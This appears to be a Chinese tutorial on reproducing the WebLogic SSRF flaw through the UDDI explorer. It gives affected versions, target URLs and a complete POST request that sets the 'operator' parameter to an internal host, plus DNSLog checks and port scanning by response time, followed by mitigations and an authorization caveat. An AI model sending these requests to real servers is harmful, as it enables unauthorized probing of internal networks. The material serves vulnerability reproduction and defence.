插件窝 干货文章 如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

Weblogic 复现 内部 请求 622    来源:    2025-04-25

Weblogic SSRF漏洞复现指南

漏洞概述

Weblogic Server中存在SSRF(Server-Side Request Forgery)漏洞,攻击者可以构造恶意请求通过服务器端发起未授权的内部网络请求,可能导致敏感信息泄露或内部服务攻击。

复现环境准备

  1. 漏洞版本

    • Oracle WebLogic Server 10.3.6.0
    • Oracle WebLogic Server 12.1.3.0
    • Oracle WebLogic Server 12.2.1.0-12.2.1.3
  2. 测试环境搭建

    • 安装有漏洞版本的Weblogic服务器
    • 测试用内部服务(如Redis、HTTP服务等)

复现步骤

方法一:通过UDDI组件实现SSRF

  1. 访问Weblogic UDDI模块:

    http://target:7001/uddiexplorer/
    
  2. 在搜索框中构造恶意URL:

    http://internal-server:port
    
  3. 点击搜索后,观察服务器是否向内部服务发起请求

方法二:通过SearchPublicRegistries.jsp实现SSRF

  1. 直接访问SearchPublicRegistries.jsp页面:

    http://target:7001/uddiexplorer/SearchPublicRegistries.jsp
    
  2. 修改请求参数:

    POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
    Host: target:7001
    Content-Type: application/x-www-form-urlencoded
    
    operator=http://internal-server:port&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
    

方法三:利用Burp Suite构造请求

  1. 拦截正常UDDI搜索请求
  2. 修改operator参数为内部服务地址
  3. 观察响应结果或内部服务日志

漏洞验证

  1. 直接观察响应

    • 如果内部服务返回特定内容,可能在Weblogic响应中看到
    • 错误信息可能泄露内部服务状态
  2. 使用DNSLog验证

    • 构造指向DNSLog平台的请求
    • 检查DNSLog是否收到解析请求
  3. 端口扫描

    • 通过响应时间差异判断端口开放状态

防护建议

  1. 升级Weblogic到最新版本
  2. 禁用或删除uddiexplorer应用
  3. 配置网络防火墙限制Weblogic服务器出站连接
  4. 使用安全组策略限制Weblogic服务器网络访问

注意事项

  1. 复现漏洞前确保获得合法授权
  2. 避免对生产环境进行测试
  3. 测试时使用可控的内部服务,避免影响真实业务

如需更详细的复现过程或特定版本的利用方法,可以提供更具体的环境信息。